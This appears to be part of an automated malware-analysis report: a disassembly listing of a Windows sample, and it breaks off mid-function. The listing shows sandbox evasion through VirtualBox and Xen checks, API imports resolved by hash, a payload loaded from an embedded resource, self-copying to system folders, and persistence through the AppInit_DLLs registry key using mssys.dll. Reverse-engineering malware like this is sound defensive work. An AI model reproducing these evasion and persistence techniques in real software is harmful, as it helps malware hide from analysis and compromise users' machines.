00412C21 call 00415F8Fh
00412C26 add esp, 0Ch
00412C29 mov cl, byte ptr [00411993h] 65
00412C2F mov byte ptr [ebp-00000260h], cl
00412C35 push 00000063h
00412C37 push 00000000h
00412C39 lea edx, dword ptr [ebp-0000025Fh]
00412C3F push edx
00412C40 call 00415F8Fh
00412C45 add esp, 0Ch
00412C48 mov al, byte ptr [00411997h] 00
00412C4D mov byte ptr [ebp-000001FCh], al
00412C53 push 00000063h
00412C55 push 00000000h
00412C57 lea ecx, dword ptr [ebp-000001FBh]
00412C5D push ecx
00412C5E call 00415F8Fh
00412C63 add esp, 0Ch
00412C66 mov edx, dword ptr [0041205Ch] ASCII "VBoxMouse"
00412C6C mov dword ptr [ebp-00000198h], edx
00412C72 mov eax, dword ptr [00412060h] 73756F4D
00412C77 mov dword ptr [ebp-00000194h], eax
00412C7D mov cx, word ptr [00412064h] 0065
00412C84 mov word ptr [ebp-00000190h], cx
00412C8B push 0000005Ah
00412C8D push 00000000h
00412C8F lea edx, dword ptr [ebp-0000018Eh]
00412C95 push edx
00412C96 call 00415F8Fh
00412C9B add esp, 0Ch
00412C9E mov eax, dword ptr [00412068h] ASCII "VBoxGuest"
00412CA3 mov dword ptr [ebp-00000134h], eax
00412CA9 mov ecx, dword ptr [0041206Ch] 73657547
00412CAF mov dword ptr [ebp-00000130h], ecx
00412CB5 mov dx, word ptr [00412070h] 0074
00412CBC mov word ptr [ebp-0000012Ch], dx
00412CC3 push 0000005Ah
00412CC5 push 00000000h
00412CC7 lea eax, dword ptr [ebp-0000012Ah]
00412CCD push eax
00412CCE call 00415F8Fh
00412CD3 add esp, 0Ch
00412CD6 mov ecx, dword ptr [00412074h] ASCII "VBoxService"
00412CDC mov dword ptr [ebp-000000D0h], ecx
00412CE2 mov edx, dword ptr [00412078h] 76726553
00412CE8 mov dword ptr [ebp-000000CCh], edx
00412CEE mov eax, dword ptr [0041207Ch] 00656369
00412CF3 mov dword ptr [ebp-000000C8h], eax
00412CF9 push 00000058h
00412CFB push 00000000h
00412CFD lea ecx, dword ptr [ebp-000000C4h]
00412D03 push ecx
00412D04 call 00415F8Fh
00412D09 add esp, 0Ch
00412D0C mov edx, dword ptr [00412080h] ASCII "VBoxSF"
00412D12 mov dword ptr [ebp-6Ch], edx
00412D15 mov ax, word ptr [00412084h] 4653
00412D1B mov word ptr [ebp-68h], ax
00412D1F mov cl, byte ptr [00412086h] 00
00412D25 mov byte ptr [ebp-66h], cl
00412D28 push 0000005Dh
00412D2A push 00000000h
00412D2C lea edx, dword ptr [ebp-65h]
00412D2F push edx
00412D30 call 00415F8Fh
00412D35 add esp, 0Ch
00412D38 mov eax, dword ptr [00412088h] ASCII "Identifier"
00412D3D mov dword ptr [ebp-00000648h], eax
00412D43 mov ecx, dword ptr [0041208Ch] 69666974
00412D49 mov dword ptr [ebp-00000644h], ecx
00412D4F mov dx, word ptr [00412090h] 7265
00412D56 mov word ptr [ebp-00000640h], dx
00412D5D mov al, byte ptr [00412092h] 00
00412D62 mov byte ptr [ebp-0000063Eh], al
00412D68 push 00000059h
00412D6A push 00000000h
00412D6C lea ecx, dword ptr [ebp-0000063Dh]
00412D72 push ecx
00412D73 call 00415F8Fh
00412D78 add esp, 0Ch
00412D7B mov edx, dword ptr [00412094h] ASCII "SystemBiosVersion"
00412D81 mov dword ptr [ebp-000005E4h], edx
00412D87 mov eax, dword ptr [00412098h] 69426D65
00412D8C mov dword ptr [ebp-000005E0h], eax
00412D92 mov ecx, dword ptr [0041209Ch] 6556736F
00412D98 mov dword ptr [ebp-000005DCh], ecx
00412D9E mov edx, dword ptr [004120A0h] 6F697372
00412DA4 mov dword ptr [ebp-000005D8h], edx
00412DAA mov ax, word ptr [004120A4h] 006E
00412DB0 mov word ptr [ebp-000005D4h], ax
00412DB7 push 00000052h
00412DB9 push 00000000h
00412DBB lea ecx, dword ptr [ebp-000005D2h]
00412DC1 push ecx
00412DC2 call 00415F8Fh
00412DC7 add esp, 0Ch
00412DCA mov edx, dword ptr [004120A8h] ASCII "VBOX"
00412DD0 mov dword ptr [ebp-00000650h], edx
00412DD6 mov al, byte ptr [004120ACh] 00
00412DDB mov byte ptr [ebp-0000064Ch], al
00412DE1 xor ecx, ecx
00412DE3 mov word ptr [ebp-04h], cx
00412DE7 jmp 00412DF5h
00412DE9 mov dx, word ptr [ebp-04h] xrefs 00412E2C
00412DED add dx, 0001h
00412DF1 mov word ptr [ebp-04h], dx
00412DF5 movzx eax, word ptr [ebp-04h] xrefs 00412DE7
00412DF9 cmp eax, 03h
00412DFC jnl 00412E2Eh
00412DFE push 00000004h
00412E00 lea ecx, dword ptr [ebp-00000328h]
00412E06 push ecx
00412E07 movzx edx, word ptr [ebp-04h]
00412E0B imul edx, edx, 64h
00412E0E lea eax, dword ptr [ebp+edx-00000580h]
00412E15 push eax
00412E16 call 00413450h
00412E1B add esp, 0Ch
00412E1E movzx ecx, al
00412E21 test ecx, ecx
00412E23 je 00412E2Ch
00412E25 mov al, 01h
00412E27 jmp 00412F26h
00412E2C jmp 00412DE9h xrefs 00412E23
00412E2E movzx edx, word ptr [ebp-04h] xrefs 00412DFC
00412E32 imul edx, edx, 64h
00412E35 lea eax, dword ptr [ebp+edx-00000580h]
00412E3C mov dword ptr [ebp-00000680h], eax
00412E42 push 00000004h
00412E44 lea ecx, dword ptr [ebp-00000198h]
00412E4A push ecx
00412E4B mov edx, dword ptr [ebp-00000680h]
00412E51 push edx
00412E52 call 00413450h
00412E57 add esp, 0Ch
00412E5A movzx eax, al
00412E5D mov cx, word ptr [ebp-04h]
00412E61 add cx, 0001h
00412E65 mov word ptr [ebp-04h], cx
00412E69 test eax, eax
00412E6B je 00412E74h
00412E6D mov al, 01h
00412E6F jmp 00412F26h
00412E74 xor edx, edx xrefs 00412E6B
00412E76 mov word ptr [ebp-00000654h], dx
00412E7D jmp 00412E91h
00412E7F mov ax, word ptr [ebp-00000654h] xrefs 00412EE1
00412E86 add ax, 0001h
00412E8A mov word ptr [ebp-00000654h], ax
00412E91 movzx ecx, word ptr [ebp-00000654h] xrefs 00412E7D
00412E98 cmp ecx, 02h
00412E9B jnl 00412EE3h
00412E9D lea edx, dword ptr [ebp-00000650h]
00412EA3 push edx
00412EA4 movzx eax, word ptr [ebp-00000654h]
00412EAB imul eax, eax, 64h
00412EAE lea ecx, dword ptr [ebp+eax-00000648h]
00412EB5 push ecx
00412EB6 movzx edx, word ptr [ebp-04h]
00412EBA movzx eax, word ptr [ebp-00000654h]
00412EC1 add edx, eax
00412EC3 imul edx, edx, 64h
00412EC6 lea ecx, dword ptr [ebp+edx-00000580h]
00412ECD push ecx
00412ECE call 00413560h
00412ED3 add esp, 0Ch
00412ED6 movzx edx, al
00412ED9 test edx, edx
00412EDB je 00412EE1h
00412EDD mov al, 01h
00412EDF jmp 00412F26h
00412EE1 jmp 00412E7Fh xrefs 00412EDB
00412EE3 xor eax, eax xrefs 00412E9B
00412EE5 mov word ptr [ebp-04h], ax
00412EE9 jmp 00412EF7h
00412EEB mov cx, word ptr [ebp-04h] xrefs 00412F22
00412EEF add cx, 0001h
00412EF3 mov word ptr [ebp-04h], cx
00412EF7 movzx edx, word ptr [ebp-04h] xrefs 00412EE9
00412EFB cmp edx, 02h
00412EFE jnl 00412F24h
00412F00 movzx eax, word ptr [ebp-04h]
00412F04 imul eax, eax, 14h
00412F07 lea ecx, dword ptr [ebp+eax-0000067Ch]
00412F0E push ecx
00412F0F call 00413380h
00412F14 add esp, 04h
00412F17 movzx edx, al
00412F1A test edx, edx
00412F1C je 00412F22h
00412F1E mov al, 01h
00412F20 jmp 00412F26h
00412F22 jmp 00412EEBh xrefs 00412F1C
00412F24 xor al, al xrefs 00412EFE
00412F26 pop edi xrefs 00412F20, 00412EDF, 00412E6F, 00412E27
00412F27 pop esi
00412F28 mov esp, ebp
00412F2A pop ebp
00412F2B ret function end
Function 00415D90, API count: 1, instr count: 50
APIs
    • LoadLibraryA.KERNEL32, ref: 004158E6
  • LoadLibraryA.KERNEL32, ref: 00415DFC
Address Instruction Meta Information
00415D90 push ebp xrefs 00415E7C
00415D91 mov ebp, esp
00415D93 sub esp, 00000110h
00415D99 mov dword ptr [ebp-04h], 00000000h
00415DA0 jmp 00415DABh
00415DA2 mov eax, dword ptr [ebp-04h] xrefs 00415E35
00415DA5 add eax, 01h
00415DA8 mov dword ptr [ebp-04h], eax
00415DAB cmp dword ptr [ebp-04h], 03h xrefs 00415DA0
00415DAF jnc 00415E3Ah
00415DB5 mov ecx, dword ptr [ebp-04h]
00415DB8 imul ecx, ecx, 06h
00415DBB mov edx, dword ptr [ecx+00416388h]
00415DC1 cmp edx, dword ptr [ebp+0Ch]
00415DC4 jne 00415E35h
00415DC6 mov eax, dword ptr [ebp-04h]
00415DC9 cmp dword ptr [00418C38h+eax*4], 00000000h
00415DD1 jne 00415E1Ah
00415DD3 lea ecx, dword ptr [ebp-00000110h]
00415DD9 push ecx
00415DDA mov edx, dword ptr [ebp-04h]
00415DDD imul edx, edx, 06h
00415DE0 movzx eax, word ptr [edx+0041638Ch]
00415DE7 add eax, 0041639Ah
00415DEC push eax
00415DED call 00415D50h
00415DF2 add esp, 08h
00415DF5 lea ecx, dword ptr [ebp-00000110h]
00415DFB push ecx
00415DFC call dword ptr [00418C44h] LoadLibraryA@KERNEL32.DLL (Hidden Import)
00415E02 mov edx, dword ptr [ebp-04h]
00415E05 mov dword ptr [00418C38h+edx*4], eax
00415E0C mov eax, dword ptr [ebp-04h]
00415E0F cmp dword ptr [00418C38h+eax*4], 00000000h
00415E17 jne 00415E1Ah
00415E19 int3
00415E1A push 00000000h xrefs 00415DD1, 00415E17
00415E1C mov ecx, dword ptr [ebp+08h]
00415E1F push ecx
00415E20 mov edx, dword ptr [ebp-04h]
00415E23 mov eax, dword ptr [00418C38h+edx*4]
00415E2A push eax
00415E2B call 00415760h
00415E30 add esp, 0Ch
00415E33 jmp 00415E3Bh
00415E35 jmp 00415DA2h xrefs 00415DC4
00415E3A int3 xrefs 00415DAF
00415E3B mov esp, ebp xrefs 00415E33
00415E3D pop ebp
00415E3E ret function end
Function 004160BE, API count: 1, instr count: 18
APIs
    • WriteFile.KERNEL32, ref: 004162D0
  • wvsprintfA.USER32, ref: 004160DC
Address Instruction Meta Information
004160BE push ebp xrefs 004155CA, 0041548A
004160BF mov ebp, esp
004160C1 sub esp, 00000400h
004160C7 lea eax, dword ptr [ebp+10h]
004160CA push eax
004160CB push dword ptr [ebp+0Ch]
004160CE lea eax, dword ptr [ebp-00000400h]
004160D4 push eax
004160D5 mov byte ptr [ebp-00000400h], 00000000h
004160DC call dword ptr [00401034h] wvsprintfA@USER32.DLL (Import)
004160E2 push dword ptr [ebp+08h]
004160E5 lea eax, dword ptr [ebp-00000400h]
004160EB push eax
004160EC call 004162AFh
004160F2 pop ecx Count = 2
004160F3 leave
004160F4 ret function end
Function 004136E0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Process32Next.KERNEL32, ref: 004136FA
Address Instruction Meta Information
004136E0 push ebp xrefs 004133F3
004136E1 mov ebp, esp
004136E3 mov eax, dword ptr [ebp+0Ch]
004136E6 push eax
004136E7 mov ecx, dword ptr [ebp+08h]
004136EA push ecx
004136EB push 6B5366BEh
004136F0 push C930EA1Eh
004136F5 call 00415E40h
004136FA call eax Process32Next@KERNEL32.DLL (Hidden Import)
004136FC pop ebp
004136FD retn 0008h function end
Function 00415E40, API count: 1, instr count: 37
APIs
    • LoadLibraryA.KERNEL32, ref: 00415DFC
  • SwitchToThread.KERNEL32, ref: 00415E55
Address Instruction Meta Information
00415E40 push ebp xrefs 00413741, 004137A1, 0041377D, 00414AB1, 004149E9, 004141CA, 00414105, 00414A19, 004141F5, 00412265, 00412281, 004122A5, 004137F1, 00414A61, 00414A95, 00413FB9, 00414011, 00414239, 00414AD9, 00414B05, 00414B25, 00414B41, 00414B75, 0041443D, 00414465, 00414481, 0041449D, 004144E5, 00414511, 00414541, 00414565, 00414581, 00413F81, 004145A5, 004137D5, 004136B5, 004136D5, 00413711, 004136F5, 00414191, 00414281, 004156F9, 00414FFD, 00415025, 0041504D, 00415351, 0041536D, 004153A9, 00414121, 00414211, 0041414D, 00414171, 004140C1, 004141AD, 00413FE5, 0041403D, 00414075, 004140A1, 00413F65, 004140E1, 00414261
00415E41 mov ebp, esp
00415E43 push ecx
00415E44 mov eax, 00000001h xrefs 00415E5B
00415E49 mov ecx, 004164ECh
00415E4E xchg dword ptr [ecx], eax
00415E50 cmp eax, 01h
00415E53 jne 00415E5Dh
00415E55 call dword ptr [00418C48h] SwitchToThread@KERNEL32.DLL (Hidden Import)
00415E5B jmp 00415E44h
00415E5D mov edx, dword ptr [ebp+08h] xrefs 00415E53
00415E60 push edx
00415E61 mov ecx, 00416CF0h
00415E66 call 00415980h
00415E6B mov dword ptr [ebp-04h], eax
00415E6E cmp dword ptr [ebp-04h], 00000000h
00415E72 jne 00415E99h
00415E74 mov eax, dword ptr [ebp+0Ch]
00415E77 push eax
00415E78 mov ecx, dword ptr [ebp+08h]
00415E7B push ecx
00415E7C call 00415D90h
00415E81 add esp, 08h
00415E84 mov dword ptr [ebp-04h], eax
00415E87 mov edx, dword ptr [ebp-04h]
00415E8A push edx
00415E8B mov eax, dword ptr [ebp+08h]
00415E8E push eax
00415E8F mov ecx, 00416CF0h
00415E94 call 004159B0h
00415E99 xor ecx, ecx xrefs 00415E72
00415E9B mov edx, 004164ECh
00415EA0 xchg dword ptr [edx], ecx
00415EA2 mov eax, dword ptr [ebp-04h]
00415EA5 mov esp, ebp
00415EA7 pop ebp
00415EA8 retn 0008h function end
Function 00413700, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CloseHandle.KERNEL32, ref: 00413716
Address Instruction Meta Information
00413700 push ebp xrefs 00413442, 00414DAB, 0041532C, 004151B7, 0041517B, 00413D24, 00413D30, 00413D3C, 00413B62, 00413B6E, 00413B7A, 00413B20, 00413B2C, 00413AC2, 00413ACE, 00413A72, 00413A0B
00413701 mov ebp, esp
00413703 mov eax, dword ptr [ebp+08h]
00413706 push eax
00413707 push 6B5366BEh
0041370C push 723EB0D5h
00413711 call 00415E40h
00413716 call eax CloseHandle@KERNEL32.DLL (Import)
00413718 pop ebp
00413719 retn 0004h function end
Function 00412F30, API count: 0, instr count: 229
Strings
  • xenservice.exe, va: 004120B0
  • HARDWARE\ACPI\DSDT, va: 004120C0
  • HARDWARE\ACPI\FADT, va: 004120D4
  • HARDWARE\ACPI\RSDT, va: 004120E8
  • SYSTEM\ControlSet001\Services, va: 004120FC
  • Xen, va: 0041211C
  • xenevtchn, va: 00412120
  • xennet, va: 0041212C
  • xennet6, va: 00412134
  • xensvc, va: 0041213C
  • xenvdb, va: 00412144
Address Instruction Meta Information
00412F30 push ebp xrefs 0041481E
00412F31 mov ebp, esp
00412F33 sub esp, 00000590h
00412F39 push esi
00412F3A push edi
00412F3B mov eax, dword ptr [004120B0h] ASCII "xenservice.exe"
00412F40 mov dword ptr [ebp-00000590h], eax
00412F46 mov ecx, dword ptr [004120B4h] 69767265
00412F4C mov dword ptr [ebp-0000058Ch], ecx
00412F52 mov edx, dword ptr [004120B8h] 652E6563
00412F58 mov dword ptr [ebp-00000588h], edx
00412F5E mov ax, word ptr [004120BCh] 6578
00412F64 mov word ptr [ebp-00000584h], ax
00412F6B mov cl, byte ptr [004120BEh] 00
00412F71 mov byte ptr [ebp-00000582h], cl
00412F77 lea edx, dword ptr [ebp-00000590h]
00412F7D push edx
00412F7E call 00413380h
00412F83 add esp, 04h
00412F86 movzx eax, al
00412F89 test eax, eax
00412F8B je 00412F94h
00412F8D mov al, 01h
00412F8F jmp 004132D3h
00412F94 mov ecx, dword ptr [004120C0h] ASCII "HARDWARE\ACPI\DSDT" xrefs 00412F8B
00412F9A mov dword ptr [ebp-00000580h], ecx
00412FA0 mov edx, dword ptr [004120C4h] 45524157
00412FA6 mov dword ptr [ebp-0000057Ch], edx
00412FAC mov eax, dword ptr [004120C8h] 5043415C
00412FB1 mov dword ptr [ebp-00000578h], eax
00412FB7 mov ecx, dword ptr [004120CCh] 53445C49
00412FBD mov dword ptr [ebp-00000574h], ecx
00412FC3 mov dx, word ptr [004120D0h] 5444
00412FCA mov word ptr [ebp-00000570h], dx
00412FD1 mov al, byte ptr [004120D2h] 00
00412FD6 mov byte ptr [ebp-0000056Eh], al
00412FDC push 00000051h
00412FDE push 00000000h
00412FE0 lea ecx, dword ptr [ebp-0000056Dh]
00412FE6 push ecx
00412FE7 call 00415F8Fh
00412FEC add esp, 0Ch
00412FEF mov edx, dword ptr [004120D4h] ASCII "HARDWARE\ACPI\FADT"
00412FF5 mov dword ptr [ebp-0000051Ch], edx
00412FFB mov eax, dword ptr [004120D8h] 45524157
00413000 mov dword ptr [ebp-00000518h], eax
00413006 mov ecx, dword ptr [004120DCh] 5043415C
0041300C mov dword ptr [ebp-00000514h], ecx
00413012 mov edx, dword ptr [004120E0h] 41465C49
00413018 mov dword ptr [ebp-00000510h], edx
0041301E mov ax, word ptr [004120E4h] 5444
00413024 mov word ptr [ebp-0000050Ch], ax
0041302B mov cl, byte ptr [004120E6h] 00
00413031 mov byte ptr [ebp-0000050Ah], cl
00413037 push 00000051h
00413039 push 00000000h
0041303B lea edx, dword ptr [ebp-00000509h]
00413041 push edx
00413042 call 00415F8Fh
00413047 add esp, 0Ch
0041304A mov eax, dword ptr [004120E8h] ASCII "HARDWARE\ACPI\RSDT"
0041304F mov dword ptr [ebp-000004B8h], eax
00413055 mov ecx, dword ptr [004120ECh] 45524157
0041305B mov dword ptr [ebp-000004B4h], ecx
00413061 mov edx, dword ptr [004120F0h] 5043415C
00413067 mov dword ptr [ebp-000004B0h], edx
0041306D mov eax, dword ptr [004120F4h] 53525C49
00413072 mov dword ptr [ebp-000004ACh], eax
00413078 mov cx, word ptr [004120F8h] 5444
0041307F mov word ptr [ebp-000004A8h], cx
00413086 mov dl, byte ptr [004120FAh] 00
0041308C mov byte ptr [ebp-000004A6h], dl
00413092 push 00000051h
00413094 push 00000000h
00413096 lea eax, dword ptr [ebp-000004A5h]
0041309C push eax
0041309D call 00415F8Fh
004130A2 add esp, 0Ch
004130A5 mov ecx, 00000007h
004130AA mov esi, 004120FCh ASCII "SYSTEM\ControlSet001\Services"
004130AF lea edi, dword ptr [ebp-00000454h]
004130B5 rep movsd
004130B7 movsw
004130B9 push 00000046h
004130BB push 00000000h
004130BD lea ecx, dword ptr [ebp-00000436h]
004130C3 push ecx
004130C4 call 00415F8Fh
004130C9 add esp, 0Ch
004130CC mov edx, dword ptr [0041211Ch] ASCII "Xen"
004130D2 mov dword ptr [ebp-000003F0h], edx
004130D8 push 00000060h
004130DA push 00000000h
004130DC lea eax, dword ptr [ebp-000003ECh]
004130E2 push eax
004130E3 call 00415F8Fh
004130E8 add esp, 0Ch
004130EB mov cl, byte ptr [0041199Bh] 00
004130F1 mov byte ptr [ebp-0000038Ch], cl
004130F7 push 00000063h
004130F9 push 00000000h
004130FB lea edx, dword ptr [ebp-0000038Bh]
00413101 push edx
00413102 call 00415F8Fh
00413107 add esp, 0Ch
0041310A mov al, byte ptr [0041199Fh] 00
0041310F mov byte ptr [ebp-00000328h], al
00413115 push 00000063h
00413117 push 00000000h
00413119 lea ecx, dword ptr [ebp-00000327h]
0041311F push ecx
00413120 call 00415F8Fh
00413125 add esp, 0Ch
00413128 mov dl, byte ptr [004119A3h] 00
0041312E mov byte ptr [ebp-000002C4h], dl
00413134 push 00000063h
00413136 push 00000000h
00413138 lea eax, dword ptr [ebp-000002C3h]
0041313E push eax
0041313F call 00415F8Fh
00413144 add esp, 0Ch
00413147 mov cl, byte ptr [004119A7h] 00
0041314D mov byte ptr [ebp-00000260h], cl
00413153 push 00000063h
00413155 push 00000000h
00413157 lea edx, dword ptr [ebp-0000025Fh]
0041315D push edx
0041315E call 00415F8Fh
00413163 add esp, 0Ch
00413166 mov eax, dword ptr [00412120h] ASCII "xenevtchn"
0041316B mov dword ptr [ebp-000001FCh], eax
00413171 mov ecx, dword ptr [00412124h] 68637476
00413177 mov dword ptr [ebp-000001F8h], ecx
0041317D mov dx, word ptr [00412128h] 006E
00413184 mov word ptr [ebp-000001F4h], dx
0041318B push 0000005Ah
0041318D push 00000000h
0041318F lea eax, dword ptr [ebp-000001F2h]
00413195 push eax
00413196 call 00415F8Fh
0041319B add esp, 0Ch
0041319E mov ecx, dword ptr [0041212Ch] ASCII "xennet"
004131A4 mov dword ptr [ebp-00000198h], ecx
004131AA mov dx, word ptr [00412130h] 7465
004131B1 mov word ptr [ebp-00000194h], dx
004131B8 mov al, byte ptr [00412132h] 00
004131BD mov byte ptr [ebp-00000192h], al
004131C3 push 0000005Dh
004131C5 push 00000000h
004131C7 lea ecx, dword ptr [ebp-00000191h]
004131CD push ecx
004131CE call 00415F8Fh
004131D3 add esp, 0Ch
004131D6 mov edx, dword ptr [00412134h] ASCII "xennet6"
004131DC mov dword ptr [ebp-00000134h], edx
004131E2 mov eax, dword ptr [00412138h] 00367465
004131E7 mov dword ptr [ebp-00000130h], eax
004131ED push 0000005Ch
004131EF push 00000000h
004131F1 lea ecx, dword ptr [ebp-0000012Ch]
004131F7 push ecx
004131F8 call 00415F8Fh
004131FD add esp, 0Ch
00413200 mov edx, dword ptr [0041213Ch] ASCII "xensvc"
00413206 mov dword ptr [ebp-000000D0h], edx
0041320C mov ax, word ptr [00412140h] 6376
00413212 mov word ptr [ebp-000000CCh], ax
00413219 mov cl, byte ptr [00412142h] 00
0041321F mov byte ptr [ebp-000000CAh], cl
00413225 push 0000005Dh
00413227 push 00000000h
00413229 lea edx, dword ptr [ebp-000000C9h]
0041322F push edx
00413230 call 00415F8Fh
00413235 add esp, 0Ch
00413238 mov eax, dword ptr [00412144h] ASCII "xenvdb"
0041323D mov dword ptr [ebp-6Ch], eax
00413240 mov cx, word ptr [00412148h] 6264
00413247 mov word ptr [ebp-68h], cx
0041324B mov dl, byte ptr [0041214Ah] 00
00413251 mov byte ptr [ebp-66h], dl
00413254 push 0000005Dh
00413256 push 00000000h
00413258 lea eax, dword ptr [ebp-65h]
0041325B push eax
0041325C call 00415F8Fh
00413261 add esp, 0Ch
00413264 xor ecx, ecx
00413266 mov word ptr [ebp-04h], cx
0041326A jmp 00413278h
0041326C mov dx, word ptr [ebp-04h] xrefs 004132AC
00413270 add dx, 0001h
00413274 mov word ptr [ebp-04h], dx
00413278 movzx eax, word ptr [ebp-04h] xrefs 0041326A
0041327C cmp eax, 03h
0041327F jnl 004132AEh
00413281 push 00000004h
00413283 lea ecx, dword ptr [ebp-000003F0h]
00413289 push ecx
0041328A movzx edx, word ptr [ebp-04h]
0041328E imul edx, edx, 64h
00413291 lea eax, dword ptr [ebp+edx-00000580h]
00413298 push eax
00413299 call 00413450h
0041329E add esp, 0Ch
004132A1 movzx ecx, al
004132A4 test ecx, ecx
004132A6 je 004132ACh
004132A8 mov al, 01h
004132AA jmp 004132D3h
004132AC jmp 0041326Ch xrefs 004132A6
004132AE push 00000004h xrefs 0041327F
004132B0 lea edx, dword ptr [ebp-000001FCh]
004132B6 push edx
004132B7 lea eax, dword ptr [ebp-00000454h]
004132BD push eax
004132BE call 00413450h
004132C3 add esp, 0Ch
004132C6 movzx ecx, al
004132C9 test ecx, ecx
004132CB je 004132D1h
004132CD mov al, 01h
004132CF jmp 004132D3h
004132D1 xor al, al xrefs 004132CB
004132D3 pop edi xrefs 004132CF, 004132AA, 00412F8F
004132D4 pop esi
004132D5 mov esp, ebp
004132D7 pop ebp
004132D8 ret function end
Function 004147E0, API count: 0, instr count: 140
Strings
  • %APPDATA%, va: 00411C78
  • %TEMP%, va: 00411C84
  • %WINDIR%\WEB, va: 00411C8C
  • RT_RCDATA, va: 00411C9C
Address Instruction Meta Information
004147E0 push ebp xrefs 004161E4
004147E1 mov ebp, esp
004147E3 sub esp, 00000130h
004147E9 call 00415D00h
004147EE call 004122B0h
004147F3 movzx eax, al
004147F6 test eax, eax
004147F8 jne 0041482Ah
004147FA call 00412540h
004147FF movzx ecx, al
00414802 test ecx, ecx
00414804 jne 0041482Ah
00414806 call 004127E0h
0041480B movzx edx, al
0041480E test edx, edx
00414810 jne 0041482Ah
00414812 call 004129B0h
00414817 movzx eax, al
0041481A test eax, eax
0041481C jne 0041482Ah
0041481E call 00412F30h
00414823 movzx ecx, al
00414826 test ecx, ecx
00414828 je 00414831h
0041482A push 00000000h xrefs 004147F8, 00414804, 00414810, 0041481C
0041482C call 00414AA0h
00414831 push 00411C78h ASCII "%APPDATA%" xrefs 00414828
00414836 call 004145B0h
0041483B add esp, 04h
0041483E mov dword ptr [ebp-00000128h], eax
00414844 mov edx, dword ptr [ebp-00000128h]
0041484A push edx
0041484B call 00414630h
00414850 add esp, 04h
00414853 push 00411C84h ASCII "%TEMP%"
00414858 call 004145B0h
0041485D add esp, 04h
00414860 mov dword ptr [ebp-00000114h], eax
00414866 mov eax, dword ptr [ebp-00000114h]
0041486C push eax
0041486D call 00414630h
00414872 add esp, 04h
00414875 push 00411C8Ch ASCII "%WINDIR%\WEB"
0041487A call 004145B0h
0041487F add esp, 04h
00414882 mov dword ptr [ebp-00000124h], eax
00414888 mov ecx, dword ptr [ebp-00000124h]
0041488E push ecx
0041488F call 00414630h
00414894 add esp, 04h
00414897 call 00412190h
0041489C movzx edx, al
0041489F test edx, edx
004148A1 je 004148AAh
004148A3 push 00000000h
004148A5 call 00414AA0h
004148AA call 004146E0h xrefs 004148A1
004148AF push 00000104h
004148B4 lea eax, dword ptr [ebp-00000110h]
004148BA push eax
004148BB push 00000000h
004148BD call 00414220h
004148C2 push 00411C9Ch ASCII "RT_RCDATA"
004148C7 push 00000065h
004148C9 push 00000000h
004148CB call 00414AC0h
004148D0 mov dword ptr [ebp-00000120h], eax
004148D6 cmp dword ptr [ebp-00000120h], 00000000h
004148DD jne 004148E6h
004148DF xor eax, eax
004148E1 jmp 004149C4h
004148E6 mov ecx, dword ptr [ebp-00000120h] xrefs 004148DD
004148EC push ecx
004148ED push 00000000h
004148EF call 00414AF0h
004148F4 mov dword ptr [ebp-04h], eax
004148F7 mov edx, dword ptr [ebp-00000120h]
004148FD push edx
004148FE push 00000000h
00414900 call 00414B10h
00414905 mov dword ptr [ebp-0000011Ch], eax
0041490B cmp dword ptr [ebp-0000011Ch], 00000000h
00414912 jne 0041491Bh
00414914 xor eax, eax
00414916 jmp 004149C4h
0041491B mov eax, dword ptr [ebp-0000011Ch] xrefs 00414912
00414921 push eax
00414922 call 00414B30h
00414927 mov dword ptr [ebp-00000118h], eax
0041492D cmp dword ptr [ebp-00000118h], 00000000h
00414934 jne 0041493Dh
00414936 xor eax, eax
00414938 jmp 004149C4h
0041493D call 00414B80h xrefs 00414934
00414942 test eax, eax
00414944 je 00414973h
00414946 lea ecx, dword ptr [ebp-00000130h]
0041494C push ecx
0041494F push 00000000h Count = 2
00414951 push 00414DC0h
00414958 push 00000000h Count = 2
0041495A call 00414B50h
0041495F mov dword ptr [ebp-0000012Ch], eax
00414965 push FFFFFFFFh
00414967 mov edx, dword ptr [ebp-0000012Ch]
0041496D push edx
0041496E call 00414590h
00414977 push 00000000h Count = 3
00414979 push 00413ED0h
00414980 push 00000000h Count = 2
00414982 call 00414B50h
0041498B push 00000000h Count = 3
0041498D push 004153C0h
00414994 push 00000000h Count = 2
00414996 call 00414B50h
0041499B push 00000007h
0041499D push 00000000h
0041499F mov eax, dword ptr [ebp-04h]
004149A2 push eax
004149A3 mov ecx, dword ptr [ebp-00000118h]
004149A9 push ecx
004149AA call 004146A0h
004149AF add esp, 10h
004149B2 push eax
004149B3 lea edx, dword ptr [ebp-00000110h]
004149B9 push edx
004149BA call 00414290h
004149BF add esp, 08h
004149C2 xor eax, eax
004149C4 mov esp, ebp xrefs 00414938, 00414916, 004148E1
004149C6 pop ebp
004149C7 retn 0010h function end
Function 004162FF, API count: 1, instr count: 13
APIs
  • ExitProcess.KERNEL32, ref: 0041632D
Address Instruction Meta Information
004162FF call 0041635Bh xrefs 004161EA
00416304 push 00000000h
00416306 push 00401090h
0041630B push 0040108Ch
00416310 call 00416334h
00416315 push 00000000h
00416317 push 00401098h
0041631C push 00401094h
00416321 call 00416334h
00416326 add esp, 18h
00416329 push dword ptr [esp+04h]
0041632D call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import)
00416333 int3
Function 00413790, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegCloseKey.ADVAPI32, ref: 004137A6
Address Instruction Meta Information
00413790 push ebp xrefs 00413555, 00413529, 00413543, 004147CA, 004135DD
00413791 mov ebp, esp
00413793 mov eax, dword ptr [ebp+08h]
00413796 push eax
00413797 push 647832FCh
0041379C push DB355534h
004137A1 call 00415E40h
004137A6 call eax RegCloseKey@ADVAPI32.DLL (Hidden Import)
004137A8 pop ebp
004137A9 retn 0004h function end
Function 004146E0, API count: 0, instr count: 70
Strings
  • mssys.dll, va: 00411C10
  • %WINDIR%, va: 00411C1C
  • %s%s, va: 00411C28
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\, va: 00411C30
  • AppInit_DLLs, va: 00411C68
Address Instruction Meta Information
004146E0 push ebp xrefs 004148AA
004146E1 mov ebp, esp
004146E3 sub esp, 00000114h
004146E9 push 00411C10h ASCII "mssys.dll"
004146EE push 00411C1Ch ASCII "%WINDIR%"
004146F3 call 004145B0h
004146F8 add esp, 04h
004146FB push eax
004146FC push 00411C28h ASCII "%s%s"
00414701 lea eax, dword ptr [ebp-00000108h]
00414707 push eax
00414708 call 004141C0h
